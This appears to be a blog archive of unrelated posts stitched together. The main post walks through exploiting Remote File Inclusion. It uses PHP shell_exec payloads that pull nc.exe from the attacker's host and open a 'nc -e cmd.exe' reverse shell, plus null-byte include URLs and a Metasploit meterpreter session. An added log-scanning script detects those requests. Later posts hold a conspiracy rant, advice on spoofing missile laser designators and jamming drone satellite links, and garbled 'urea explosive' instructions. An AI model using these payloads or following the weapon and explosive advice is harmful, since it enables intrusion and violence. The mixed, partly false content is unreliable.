Sunday, June 11, 2017


From RFI to Shell


Remote File Inclusion (RFI) is a web application vulnerability attackers exploit to run malicious code. Depending on the web server configuration, an attacker may tell the web app to include code from a file hosted on a remote server. In this post, I’ll describe how to exploit RFI to get a reverse shell on the target using two methods. The first will only use tools already on the victim, while the second will use the more feature-rich metasploit method.

The Vulnerability

This application has already been found to have a vulnerability in one of the parameters sent by addguestbook.php. This post won’t cover detecting the RFI vulnerability.
The request I will be tampering with to exploit this RFI vulnerability looks like this:
/addguestbook.php?name=hacker&comment=pwned&LANG=en&Submit=Submit

Using Default Tools

Before I know what I have to work with, I must find out what OS my target is running. The first method I’ll use to do this will be to run nmap and specify host fingerprint detection:
$ nmap -O 192.168.1.144
Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-10 10:41 EST
Nmap scan report for 192.168.1.144
Host is up (0.037s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
445/tcp  open  microsoft-ds
3306/tcp open  mysql
3389/tcp open  ms-wbt-server
MAC Address: 00:50:56:AF:1D:C4 (VMware)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
Not a definitive answer, so I must trust, but verify. I’ll turn to the wappalyzer plugin for firefox. Wappalyzer has been accurate, in my experience. In either case, I’ll have to verify when I move on to the exploit phase of this exercise what the host is running.
Running Wappalyzer in my browser when I navigate to the target’s page, I see that it’s running Windows, indicated by the icon in my toolbar:
Wappalyzer
Without knowing what tools the target will have, I’ve at least narrowed it down to a handful, including ftp, tftp, telnet, and debug.exe.
I can think of a convoluted method using FTP, but that would take a while and may end up being imprecise. The same with telnet. Besides, telnet has been deprecated for quite some time, so I try to avoid it wherever possible. Debug.exe may provide a solution that would be even more convoluted than the FTP method, so I’ll stick with TFTP for this exercise.
My goal is to transfer nc.exe to the victim’s host and use it to open a reverse shell to my attacking host.

Setting up TFTP

The first step in this process is to set up the TFTP daemon and share nc. Since I don’t already have a shell on the target, I won’t know whether my commands will be successful, so I want to be as sure as I can that I won’t run into any “gotchas” – like improper file permissions. This means I need to be sure that the location I share using TFTPD is readable by anybody, and that the nc.exe file I share out will be readable and executable by anybody.
On my attacking host, I complete these steps via:
$ chmod +rx /usr/share/windows-binaries/nc.exe
$ cp /usr/share/windows-binaries/nc.exe /tmp/nc.exe
$ atftpd --daemon --port 69 /tmp/
I’m now sharing my /tmp directory, which contains my readable/executable nc.exe and is itself world-readable.

Exploit the Vulnerability

Now that I’ve got my payload ready, it’s time to exploit the RFI vulnerability on the victim. My Wappalyzer extension informed me that the host is running php, so my exploit will be written in php. I will do this by creating the files I want the victim to remotely include in my /var/www folder. Note I said files as this exploit will be carried out in two steps:
  1. Upload nc.exe to the victim, and
  2. Instruct the victim to execute nc.exe and connect back to my listener.
The first step will be carried out by the following php code:
<?php
echo shell_exec("tftp -i 192.168.14.120 GET nc.exe");
?>
I’ll store this in a file called evil.txt in /var/www. This is saved as a text file because I don’t want my web server to interpret it as a php file; I want to be sure it’s served as text content.
The second step of this exploit will involve invoking nc.exe on the host, and having it call back to my listener, establishing a reverse shell. Here’s what evil2.txt looks like:
<?php
echo shell_exec("nc.exe -nvv 192.168.14.120 4444 -e cmd.exe")
?>
On a Linux host, it would look similar to:
<?php
echo shell_exec("nc -nvv 192.168.14.120 4444 -e /bin/sh")
?>
Satisfied with these, I begin my webserver:
$ service apache2 start
[....] Starting web server: apache2
..

Enable My Listener

This crucial step involves invoking nc on my attacking box to listen for the reverse shell I will request:
$ nc -lvp 4444
listening on [any] 4444 ...

Exploit!

With everything in place, I make the first of my two requests to the web server:
/addguestbook.php?name=hacker&comment=pwned&LANG=http://192.168.14.120/evil.txt%00&Submit=Submit
Notice the %00. This is a null byte in URL-encoded format. This will instruct the web app to cease parsing or executing commands once it’s included the text (php code) in evil.txt. After waiting a few moments, I see the web app return the following information:
Transfer successful: 59392 bytes in 5 seconds, 11878 bytes/s
Excellent! This means that nc.exe has been uploaded to the victim. Now, to invoke my reverse shell, I make the following request:
/addguestbook.php?name=hacker&comment=pwned&LANG=http://192.168.14.120/evil2.txt%00&Submit=Submit
Again, using the URL-encoded null byte to ensure that application execution stops after evil2.txt has been parsed. If all went according to plan, I should see some activity from my listener:
listening on [any] 4444 ...
192.168.1.144: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.14.120] from (UNKNOWN) [192.168.1.144] 1144
Success!
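
The two requests above as they look from the defending side, in an added example that is not code from the original post: a scanner that flags access-log entries whose query parameters carry a wrapper URL or a null byte. The log lines are constructed from the post's requests; the function names, `expected_url_params`, and the `/go.php?next=` entry are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Schemes PHP can resolve through stream wrappers if a value reaches include/require.
WRAPPER_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:", "expect://")

# Combined log format; only the fields this example uses are captured.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample log, built from the requests shown in this post.
SAMPLE_LOG = """\
192.168.14.120 - - [10/Jan/2014:10:52:01 -0500] "GET /addguestbook.php?name=hacker&comment=pwned&LANG=en&Submit=Submit HTTP/1.1" 200 512
192.168.14.120 - - [10/Jan/2014:10:53:12 -0500] "GET /addguestbook.php?name=hacker&comment=pwned&LANG=http://192.168.14.120/evil.txt%00&Submit=Submit HTTP/1.1" 200 734
192.168.14.120 - - [10/Jan/2014:10:54:40 -0500] "GET /addguestbook.php?name=hacker&comment=pwned&LANG=http%3A%2F%2F192.168.14.120%2Fevil2.txt%00&Submit=Submit HTTP/1.1" 200 420
10.0.0.7 - - [10/Jan/2014:10:55:03 -0500] "GET /go.php?next=https://example.org/docs HTTP/1.1" 302 0
"""


def fully_decode(value, max_rounds=3):
    """Percent-decode until stable, since a logged value may be encoded more than once."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_target(target, expected_url_params=()):
    """Return one finding per suspicious query parameter in a request target."""
    findings = []
    query = target.partition("?")[2]
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        name = fully_decode(name)
        value = fully_decode(raw.replace("+", " "))
        reasons = []
        # A wrapper URL in a parameter that is not supposed to carry URLs.
        if name not in expected_url_params and value.lower().lstrip().startswith(WRAPPER_SCHEMES):
            reasons.append("remote-scheme")
        # A NUL byte is never legitimate in a query value, so it is always reported.
        if "\x00" in value:
            reasons.append("null-byte")
        if reasons:
            findings.append({
                "param": name,
                "value": value.replace("\x00", "\\x00"),  # printable form for the alert
                "reasons": reasons,
            })
    return findings


def scan(lines, expected_url_params=()):
    """Scan access-log lines and return alerts with source, time and status attached."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        for finding in inspect_target(m["target"], expected_url_params):
            alerts.append({"src": m["src"], "time": m["ts"],
                           "status": int(m["status"]), **finding})
    return alerts


if __name__ == "__main__":
    # "next" is declared as a parameter that legitimately carries URLs.
    for alert in scan(SAMPLE_LOG.splitlines(), expected_url_params=("next",)):
        print(alert["time"], alert["src"], alert["param"],
              ",".join(alert["reasons"]), alert["value"])
```

An access log only records query strings, so covering POST bodies means running the same check in a WAF or application middleware. Keeping `allow_url_include` disabled in php.ini removes the remote-include path itself.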

Using Metasploit

Metasploit is awesome, and if there’s a chance to use it, I’ll take it. Here’s how the vulnerable application can be exploited using the Metasploit framework:

Search for a Module

I’m not sure what the best module to use for this exploit would be, so I do a search for “php_include”:
msf> search php_include

Matching Modules
================

Name                             Disclosure Date          Rank    Description
----                             ---------------          ----    -----------
exploit/unix/webapp/php_include  2006-12-17 00:00:00 UTC  normal  PHP Remote File Include Generic Code Execution
This looks like it will fit the bill. I’ll load it up and see what my options are:
msf> use exploit/unix/webapp/php_include
msf exploit(php_include) > show options

Module options (exploit/unix/webapp/php_include):

Name      Current Setting                                                    Required  Description
----      ---------------                                                    --------  -----------
HEADERS                                                                      no        Any additional HTTP headers to send, cookies for example. Format:  "header:value,header2:value2"
PATH      /                                                                  yes       The base directory to prepend to the URL to try
PHPRFIDB  /opt/metasploit/apps/pro/msf3/data/exploits/php/rfi-locations.dat  no        A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI                                                                       no        The URI to request, with the include parameter changed to XXpathXX
POSTDATA                                                                     no        The POST data to send, with the include parameter changed to XXpathXX
Proxies                                                                      no        Use a proxy chain
RHOST                                                                        yes       The target address
RPORT     80                                                                 yes       The target port
SRVHOST   0.0.0.0                                                            yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT   8080                                                               yes       The local port to listen on.
SSLCert                                                                      no        Path to a custom SSL certificate (default is randomly generated)
URIPATH                                                                      no        The URI to use for this exploit (default is random)
VHOST                                                                        no        HTTP server virtual host

Exploit target:

Id  Name
--  ----
0   Automatic
Good deal, this looks pretty straightforward. I will need to specify the PATH, PHPURI, RHOST, RPORT, SRVHOST, and SRVPORT for this to be effective. The RHOST and RPORT bits are easy: they’re the remote host and default HTTP port. SRVHOST will be my attacking IP, and SRVPORT must be a port not already bound on my IP.
The PATH for this exploit will be /, as there is no path to the web application, it is hosted at the web root. PHPURI is the URI to request, with the vulnerable parameter changed to XXpathXX, so this will be
addguestbook.php?name=hacker&comment=pwned&LANG=XXpathXX

Exploit with MSF

I’ll set these values and then run the exploit to obtain a php meterpreter shell:
msf exploit(php_include) > set PATH /
PATH => /
msf exploit(php_include) > set PHPURI /addguestbook.php?name=hacker&comment=pwned&LANG=XXpathXX
PHPURI => /addguestbook.php?name=hacker&comment=pwned&LANG=XXpathXX
msf exploit(php_include) > set RHOST 192.168.1.144
RHOST => 192.168.1.144
As always, I need to set the PAYLOAD and the PAYLOAD options. Fortunately, MSF has a php meterpreter payload:
msf exploit(php_include) > set PAYLOAD php/meterpreter[tab]

set PAYLOAD php/meterpreter/bind_tcp       set PAYLOAD php/meterpreter/reverse_tcp   
set PAYLOAD php/meterpreter/bind_tcp_ipv6  set PAYLOAD php/meterpreter_reverse_tcp   
msf exploit(php_include) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(php_include) > show options


Module options (exploit/unix/webapp/php_include):

Name      Current Setting                                                    Required  Description
----      ---------------                                                    --------  -----------
HEADERS                                                                      no        Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
PATH      /                                                                  yes       The base directory to prepend to the URL to try 
PHPRFIDB  /opt/metasploit/apps/pro/msf3/data/exploits/php/rfi-locations.dat  no        A local file containing a list of URLs to try, with XXpathXX replacing the URL 
PHPURI    /addguestbook.php?name=hacker&comment=pwned&LANG=XXpathXX          no        The URI to request, with the include parameter changed to XXpathXX      
POSTDATA                                                                     no        The POST data to send, with the include parameter changed to XXpathXX 
Proxies                                                                      no        Use a proxy chain 
RHOST     192.168.1.144                                                      yes       The target address 
RPORT     80                                                                 yes       The target port 
SRVHOST   0.0.0.0                                                            yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0 
SRVPORT   8080                                                               yes       The local port to listen on. 
SSLCert                                                                      no        Path to a custom SSL certificate (default is randomly generated)     
URIPATH                                                                      no        The URI to use for this exploit (default is random) 
VHOST                                                                        no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Automatic


msf exploit(php_include) > set LHOST 192.168.14.120
LHOST => 192.168.14.120 
msf exploit(php_include) > set LPORT 7777
LPORT => 7777 
msf exploit(php_include) > exploit -j -z 
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.14.120:7777 
msf exploit(php_include) > 
[*] Using URL: http://0.0.0.0:8080/NKLGe9SyP 
[*] Local IP: http://192.168.14.120:8080/NKLGe9SyP 
[*] PHP include server started. 
[*] Sending stage (39848 bytes) to 192.168.1.144 
[*] Meterpreter session 1 opened (192.168.14.120:7777 -> 192.168.1.144:1110) at 2014-01-09 20:27:58 -0500

msf exploit(php_include) > sessions

Active sessions
===============

Id  Type                 Information            Connection
--  ----                 -----------            ----------
1   meterpreter php/php  offsec (0) @ XPCLIENT  192.168.14.120:7777 -> 192.168.1.144:1110 (192.168.1.144)

msf exploit(php_include) > sessions -i 1 
[*] Starting interaction with 1...

meterpreter >
Et Voila!


Friday, June 9, 2017


Battlefield Laser Warning Receiver


Introduction
"In the far distance a helicopter skimmed down between the roofs, hovered for an instant like a blue bottle, and darted away again with a curving flight.  It was the Police Patrol, snooping into people's windows.  The patrols did not matter, however.  Only the Thought Police mattered."  --- Quote from George Orwell's 1984.
Barack Hussein Obama, Jr. is a fraud.  A Kenyan-born Marxist Muslim usurper.  A creation of the liberal media.  A puppet for a handful of international central bankers and the 1%.
He's kept aloft by a continually dumbed-down public (to keep them voting Democrat), blindly ruled by oligarchs.  Surrounded by his gang of anti-American extremists and tyrants who wish to control your every thought and move.
Steal $1.2 billion from MF Global and you can run the Obama re-election campaign.  "Steal" a bunch of taxpayer-funded academic papers and you'll have your entire life ruined.  You don't need to show an ID to vote to start a war, but need a full interrogation to fly on a plane or to enact your God-given right to own a gun.  Change!
As the traitorous Goldman Sachs/General Electric/Chicago Mafia Obama regime continues to turn the United States into a nation of takers instead of a nation of makers, expect to see more violent extremism and corruption, the endless printing of funny money to keep the public docile, and racially-motivated attacks against his political enemies - all in order to take the public's mind off his failed policies and your loss of freedom.
Their latest tool is using unmanned Predator/Reaper drones equipped with laser-guided AGM-114 Hellfire missiles to kill people - including Americans - without any type of due process or jury trial.  Change!
Most U.S/NATO/ZOG laser-guided bombs and missiles use a diode-pumped, Q-switched (pulsed) Neodymium-doped Yttrium Aluminum Garnet (Nd:YAG) laser designator operating at a 1064 nanometer (+/- 2 nm) wavelength.  The designator's optics will have a low divergence, with most under 300 microradians.  That means the laser beam's effective area is about 1 meter square (or smaller) at a range of 3 kilometers.
The laser's pulse width is around 15 to 25 nanoseconds with the pulse energy around 50 to 120 millijoules.  The use of very narrow pulses means the peak output optical power is actually several thousand watts.  The laser's Pulse Repetition Frequency (PRF) is usually between 8 to 20 Hz (+/- 1 µS pulse resolution) and is externally selectable.
An individual PRF "code" is what is programmed into the bomb/missile seeker and laser designator ahead of time.  The codes are three modified-octal digits (111-488 [Band 2] and 511-788 [Band 1]), but some codes are four digits and should always start with a "1" (1111-1788).  There are a total of 677 different codes.  The code numbers determine the pulse rate, and the faster pulses are easier for the missile's laser seeker to lock-on to in a cluttered environment.  Each weapon system is assigned its own laser code to prevent interference with other systems.  NATO designator codes are officially listed in STANAG 3733, which is not available to the public.
I believe the codes may be directly related to the PRF or somehow related to the timing between the laser pulses.  For example, code 1234 would have a 12.34 Hz PRF.  A confirmed operational (Apache-launched) Hellfire missile laser code is 1155.  Overhead Predators can "lase" targets for the Apaches, if so needed.
The laser designator illuminates the intended target and the bomb/missile seeker "flies" into the reflected energy.  There can be up to 30 seconds from the time the laser is activated to the impact of the bomb/missile.  The laser designator and the bomb/missile seeker head need to both be pointing towards the target before launch.  A laser "back scatter" condition can exist where sand/dust/etc. in the air causes a false lock before the bomb/missile is launched.

High-Speed Infrared Video of an Active Laser Designator
The Hellfire missile has an indirect launch mode called "lock-on after launch" in which the missile is initially launched in an unguided mode, then seeks out the laser reflection while in the air.  This is a countermeasure to minimize the amount of time the laser designator needs to be activated.  The maximum range of the Hellfire is around 8 km.
Another potential countermeasure is called "offset designating," where the laser is aimed at a location near the target but just far enough away not to trigger a laser warning alarm.
If you're a troublemaker, it should be possible to detect the activation of an enemy laser designator, then generate YOUR OWN laser pulses at the same PRF.  You'd then point your high-power laser at a nearby location to "distract" the incoming bomb/missile from its intended target.
Note that the seeker PRF codes are often transmitted over the various open radio channels (or standardized) and some laser-based professional tattoo/hair removal systems use the same type of pulsed Nd:YAG laser...
Many UAVs can be located and tracked via their optical, acoustic, and radio emissions.  Directional microwave and satellite wireless links combined with spread-spectrum modulation is making this increasingly difficult for the undocumented SIGINT interceptor, but you'll be surprised what's out there.
Yes, some UAVs use commercial satellite relays when not operating in a "line-of-sight" mode.  eBay has all sorts of high-power Ku-band uplink transmitters and amplifiers you can use to jam, err... "simulate noise" on those particular satellite channels.
Example Predator UAV RF and Optical Emissions
Overview
This Battlefield Laser Warning Receiver (LWR) project is a very experimental design to try and detect the pulses emitted from an enemy laser designator.  The circuit will use mostly off-the-shelf components to reduce cost and to simplify the construction.
While searching through patents for "laser warning receiver," I came across U.S. Patent 5,260,563 by Tracor Aerospace.  This patent appears to be for their portable LADIS (Laser Alarm for the Individual Soldier) battlefield laser warning system.  A few components in their schematic are unlabeled, but can be determined via the detailed description of the circuit's operation in the patent text.
This LWR project will be based on the stock Tracor schematic, but with a few minor changes.  You'll want to print out the patent, then read and re-read the entire text before constructing this circuit to get an idea of what's going on.  A different front-end PIN photodiode pre-amplifier circuit will be constructed as I was unable to get the circuit in the Tracor patent to operate properly.
The main optical sensor will be three Vishay BPW34 silicon PIN photodiodes in parallel.  These are not the ideal photodiodes for detecting high-speed laser pulses at 1064 nm, but they're cheap (around $1 at Digi-Key) and they're also listed in the Tracor patent.  InGaAs PIN photodiodes salvaged from high-speed fiber optic connections will provide a much better response at 1064 nm, but silicon PIN photodiodes will still work for experimenting.
This should still be considered a test circuit to get a general idea of what it takes to detect a high-speed laser pulse.  An "ideal" battlefield LWR would have multiple optical sensors (and log amps) to cover the full 360°, plus a couple pointing up for aerial coverage.  Combined, these could also provide bearing data back to the enemy designator.
The original Tracor design has a simple Automatic Gain Control (AGC) circuit to help discriminate against background light pollution or sunlight, but optical (infrared) bandpass filtering the incoming signal is still recommended.
Because the LWR circuit is intended to detect very fast rise-time laser pulses, the front-end amplifier(s) should be designed with a fairly wide RF bandwidth (100+ MHz) in mind.  Proper RF circuit construction techniques, such as a large ground plane, surface mount components, RF shielding, and proper DC power supply decoupling, should be followed to prevent the circuit from oscillating or amplifier degradation.
The three parallel BPW34 PIN photodiodes (making up a single array) will have a reverse bias voltage (+10 VDC) on them to help increase their detection bandwidth.  A 2N4416A JFET provides a very high impedance buffer between the PIN photodiodes and the next stage amplifier.
The signal pulse from the 2N4416A is amplified by a Motorola MWA120 Wideband General-Purpose Hybrid Amplifier.  The MWA120 has a fixed gain of around 14 dB from DC to over 400 MHz and a standard 50 ohm input/output impedance.  The MWA120 probably isn't the ideal amplifier, but I had a couple laying around and they require a minimum of supporting components.  The detected laser designator pulses should be fairly strong, so not a lot of gain is required.  Wideband video amplifier ICs like the National LM733 should also work.
The output from the MWA120 is sent to a Motorola MC13055 Wideband FSK Receiver to generate a logarithmic output voltage based on the input power of the signal pulse.  The MC13055 has around 70 dB of input power detection range (-80 to -10 dBm).  The higher the power of the pulse is, the higher the voltage output will be.  The Tracor circuit uses a Motorola MC13055, but the Motorola MC3356 should also work and may be a little easier to find.
The logarithmic voltage output from the MC13055 is then sent to a LM311-based comparator circuit.  When the output pulse voltage reaches a preset threshold setting determined by a panel-mount 20 kohm potentiometer, the LM311's output goes high.  The LM311's output can be used directly as a "digital" logic level (10 volt) signal, or to trigger a 555-timer in a monostable "pulse stretcher" operation.  The 555 can then light a warning LED or signal an audio buzzer as the final laser warning alarm.

AGM-114 Hellfire on a Predator Drone
Pictures & Construction Notes

Overview of the parts for a single BPW34 PIN photodiode array for the Battlefield Laser Warning Receiver.
Three surface-mount Vishay VBPW34S PIN photodiodes are arranged in parallel and mounted behind a SO-239 connector which has had its internals removed.
The coupling ring is from an old CB radio microphone connector.  It uses the same threads as the SO-239 and will be used to hold an optional infrared bandpass filter.

Closeup view of the three parallel BPW34 PIN photodiodes mounted onto a little circuit board with matching holes for the SO-239 connector.
The drilled out (1/2-inch) SO-239 connector is on the right.

Attaching the BPW34 PIN photodiode circuit board to the rear of the SO-239 connector.
The inside of the SO-239 connector should be painted flat black to prevent off-axis reflections.

Shown with the optional infrared bandpass (808 - 1064 nm) filter.
These filters are available on eBay for around $10.
The 15 mm diameter filter fits the coupling ring perfectly.
Search eBay for something like "Filter Color Glass Lens against 400nm-750nm through IR Infrared 808nm-1064nm."
Really...

Completed single PIN photodiode sensor array for the Battlefield Laser Warning Receiver.
For a real-world application, multiple PIN photodiode sensors should be used and arranged for 360° coverage, as well as a few for aerial coverage.

Overview of the front-end amplifier circuit for the PIN photodiode array.
The small-canned item is the 2N4416A JFET buffer.
The large-canned item is the MWA120 amplifier.
This board is powered from an external +10 VDC source.
The front-end amplifier is on a separate circuit board (and uses leaded components) due to continuous experimentation.
An ideal front-end amplifier circuit should have a little more gain and include some type of automatic gain control.

Overview of the logarithmic amplifier, comparator, and alarm generating circuit.
This circuit has been pretty well debugged and should work as-is.  It's based around the logarithmic amplifier and comparator circuit in the Tracor patent.
A LM117 voltage regulator is along the top.  This generates a clean source of +10 VDC for the circuits from a +12 VDC input.  The current draw is minimal.

Alternate view of the logarithmic amplifier, comparator, and alarm generating circuit.
The +12 VDC power comes in on the lower-right.
The 16-pin IC is the MC13055 logarithmic amplifier.  The 555 pulse stretcher circuit is below it.
The two items in the middle which look like transistors are the MBD301 Schottky diodes for the LM311 comparator circuit.  A LM211 is used in place of the LM311 in this example.
When a proper "pulse" is detected by exceeding an externally settable threshold on the LM311 comparator circuit, it toggles a transistor which in turn activates the 555 pulse stretcher (monostable) circuit.  The large orange 1 µF capacitor is part of the 555's timing circuit.
The 555 timer essentially turns the incoming nanosecond pulses into 10 millisecond long pulses.
These longer pulses are used to directly sound a buzzer or light a LED to act as a final warning alarm.

Completed circuit, internal overview.
Mounting the circuit boards in an old printer switch case.
+12 VDC power input is via the banana jacks on the upper-left.  A power-indicating red LED and power switch are above it.
The green toggle switch isn't used at this time.
The yellow Alarm Select toggle switch chooses either a buzzer or LED warning alarm.
The 20 kohm potentiometer sets the threshold in the pulse comparator circuit.
A 1/8-inch stereo jack is used to connect to the external PIN photodiode array.  Be sure to use shielded wire.  The tip should be the cathode, ring the anode, and sleeve the ground.
A front-panel mounted BNC jack is used to directly monitor the MC13055 logarithmic output voltage.  This output can also be used for further signal processing.  A small piece of coax should connect this output to the front-panel BNC jack.

Alternate interior overview.
A warning alarm buzzer has been added.  This is selectable via a switch on the front-panel.
The buzzer should have its own internal driver circuit and should also be capable of being driven directly from a 555 timer.  If it can't, an additional transistor driver should be used.  Radio Shack carries a couple of suitable buzzers.
The buzzer will sound in unison with the detection of the incoming pulses.  For example, if the laser designator PRF is 12 Hz, the buzzer will also sound 12 times a second at 10 millisecond intervals.

Completed Battlefield Laser Warning Receiver.
The logarithmic amplifier Monitor BNC jack is on the lower-left.
The PIN Input 1/8-inch stereo jack is mounted above it.
The 20 kohm Threshold potentiometer is in the middle.
The green laser warning LED is below the Alarm Select switch.
To use the unit, connect the PIN photodiode array via a standard shielded stereo cable with a 1/8-inch plug (tip: cathode, ring: anode, sleeve: ground).
Turn the Threshold control completely counter-clockwise.
Apply +12 VDC power to the unit and turn it on.
The buzzer should sound or the LED should light, depending on the Alarm Select switch setting.
Slowly rotate the Threshold control clockwise until the buzzer/LED stops.
This sets the minimum pulse threshold for that particular environment.  The Threshold control may need to be continually adjusted to match other lighting conditions.
To test the LWR, set the Alarm Select switch to buzzer, then point a standard TV remote control at the PIN photodiode array.  Pressing any buttons on the remote should cause the buzzer to sound.
Schematics
Datasheets & Notes
  1. Higher resolution pictures and the original project article are available in GBPPR 'Zine Issue #109

  2. GBPPR Vision #11: Battlefield Laser Warning Receiver  (YouTube)

  3. Vishay VBPW34S Silicon PIN Photodiode  (167k PDF)

  4. Vishay 2N4416A N-Channel JFET  (54k PDF)

  5. Motorola MWA120 Wideband General-Purpose Hybrid Amplifier  (424k PDF)

  6. Motorola MC13055 Wideband FSK Receiver  (362k PDF)

  7. National LM311 Voltage Comparator  (922k PDF)

  8. Motorola MBD301 Schottky Diodes  (93k PDF)

  9. Philips CMOS 555 Timer  (108k PDF)

  10. Atmospheric Transmittance of the Electromagnetic Spectrum

  11. Wavelengths of Various Solid-State Lasers

  12. Detecting Modulated Lasers in the Battlefield and Determining their Direction  (526k PDF)

  13. Laser Terminal Homing Engagement Simulator  (3.8M PDF)

  14. Analysis and Test of a Wide Area Spectrometer  (2.6M PDF)

  15. Computer Simulation of a Laser Designator in the Operational Environment  (1.9M PDF)

  16. Laser Designator Interoperability Trials  (1M PDF)

  17. Airborne Laser Systems Testing and Analysis  (12.9M PDF)

  18. Northrop Grumman Ground Laser Target Designator (GLTD) III  (189k PDF)

  19. Northrop Grumman Lightweight Laser Designator Rangefinder  (154k PDF)

  20. Northrop Grumman PEQ-1C Laser Acquisition Marker  (118k PDF)

  21. Cilas DHY 307 Ground Laser Target Designator for Laser-Guided Weapons  (429k PDF)

  22. IAI/TAMAM DART45 Compact Dual Wavelength Laser Designator and Rangefinder Module  (671k PDF)

  23. Elbit Systems Rattler G Dismounted Coded Designator / Marker  (222k PDF)

  24. L-3 Communications Advanced Laser Systems Technology (ALST)  (689k PDF)

  25. Metrodat LAWAREC Laser Warning Receiver  (381k PDF)

  26. Selex Communications RALM 02/V2 Laser Warning Receiver  (69k PDF)

  27. Thales TYR Laser Target Designator and Imager  (293k PDF)

  28. Excelitas High Angular Resolution Laser Irradiance Detector (HARLID)  (694k PDF)  (LWR Products Division)

  29. Epitaxial Ultrasensitive, Wideband Laser Warning Receiver  (473k PDF)

  30. Boston Electronics Detectors for Laser Warning Receivers

  31. USMC Ground Laser Target Designator II - New Equipment Training  (3.7M PDF)

  32. Saab: Next Generation Laser Warning  (872k PDF)

  33. Joint Laser Designator Procedures  Joint Pub 3-09.1  (1999 Version)  (855k PDF)

  34. Laser Warning System to Detect the Number of Receiver Front-End Design  (PDF)

  35. Laser Warning Receiver  by Jin Mei  NAIC-ID(RS)T-0149-96  (931k PDF)

  36. High-Speed Fourier Transform Spectrometer for Laser Warning Receivers

  37. Tactical Laser Systems Performance Analysis in Various Weather Conditions  (1M PDF)

  38. The Vulnerability of Laser Warning Systems Against Guided Weapons Based on Low-Power Lasers  (4.1M PDF)

  39. Airborne Laser Systems Testing and Analysis: Laboratory Experimental Activities  Chapter 7 of NATO RTO-AG-300-V26.  Includes oscilloscope screen shots of real laser designator pulses.  (1.6M PDF)

  40. AN/AVR-2A Laser Warning Receiver on an Apache Helicopter - #1

  41. AN/AVR-2A Laser Warning Receiver on an Apache Helicopter - #2

  42. AN/AVR-2A Laser Warning Receiver on an Apache Helicopter - #3

  43. Heat-Seeking Missile Guidance

  44. Tiny Device Will Detect Domestic Drones  (Indiegogo Site)

  45. SkyJack: A Drone to Hack All Drones  (SkyJack Code)

  46. Not a Bug Splat  A giant art installation targets Predator drone operators.

  47. Drone Survival Guide  (English PDF)

  48. Pulse Code Recognition Method and System  U.S. Patent 5,023,888  (428k PDF)

  49. Method and System for Pulse Internal Modulation  U.S. Patent 5,026,156  (1.3M PDF)

  50. Predator UAV Engage a Group of Insurgents With a Hellfire Missile in Iraq  When "LRD LASE DES" appears on the display, the Predator's laser rangefinder/designator is enabled.  (YouTube)

  51. Lockheed Martin's DAGR Missile  Adding laser guidance to 2.75 inch Hydra rockets.  Includes a nice infrared camera view of the laser designator's target spot.  Note the laser designator's low divergence on the 5 km target.  (YouTube)

  52. Predator Strikes  (YouTube)

  53. The laser designator PRF code for the AC-130H is fixed at 1688, which I think corresponds to 10 Hz.

  54. PRF codes for laser-guided bombs (GBU-12, etc.) are set prior to taking off and cannot be changed "in the air."

  55. Pulse Interval Modulation (PIM) codes can vary the timing between pulses; these are usually used on U.S.-only weapons systems and are harder to defeat via countermeasures.

  56. The minimum launch range of the AGM-114 should be set for around 16 seconds of flight time and a 60° angle of depression.

  57. The AGM-114L Hellfire uses a millimeter wave radar seeker operating in the Ka-band, which is around 35 GHz and the same general frequency range for the Longbow Apache's radar.  There's also a bunch of military stuff around 38 GHz.

  58. The laser seeker operates in a clockwise pattern, starting at the lower-right position 2° down and 8° right.

  59. If you're really good, you can get a laser retro-reflection off the bomb/missile seeker's glass cover and actually track & monitor the incoming munition.

  60. The non-pulsed infrared laser designators/illuminators used to mark targets to be viewed via standard night vision devices operate around 820 - 860 nm.

  61. Eye-safe laser designators and range finders operate around 1540 nm.
  62. Other Related GBPPR Projects:
  63. Laser Bounce Listening Device

  64. GBPPR Interferometric Surveillance Device Experiments - Part 2

  65. GBPPR Homebrew Radar Experiments

  66. Defeating Passive Infrared Motion Sensors

  67. Techniques for Countering Thermal Imaging Devices

http://67.225.133.110/~gbpprorg/mil/laser/ 

Thursday, June 8, 2017

Ultra-fast haircut 02/2017

UREA EXPLOSIVE

Well, everybody laugh of the urine explosive, because those who understand explosives, know that urine has 95% of water, and only 5% urea (the real explosive chemical) , so it's the urea destilled from the urine, whith pure vaseline and charcoal, all mixed with your hands, and then ready to blow up, which is a powerfull bomb. So, next question, how to get urea, from urine? you use your urine in a pot, for as long as 24 hours, on the refrigator with 4 degrees. than you boil the urine to get a mass, which still contains salt, therefore, not ready yet; then you boil again with ethanol (50 gm of urine salt mass with 1 liter of ethanol) at 20 degrees. To end, you filter the remain liquid, and there it is, pure urea explosive.

Wednesday, June 7, 2017

Sound Effects Of Terrorism | Jihad | HQ

A forward does not change the URL in browser address bar

A forward tells the server to use the given JSP to present the results. It does not tell the client to send a new HTTP request for the given JSP. If you expect the address bar of the client to change, you have to tell the client to send a new HTTP request. You can do that by sending a redirect instead of a forward.
So, instead of
RequestDispatcher d=request.getRequestDispatcher("/index.jsp");
System.out.println("z");
d.forward(request, response);
do
response.sendRedirect(request.getContextPath() + "/index.jsp");
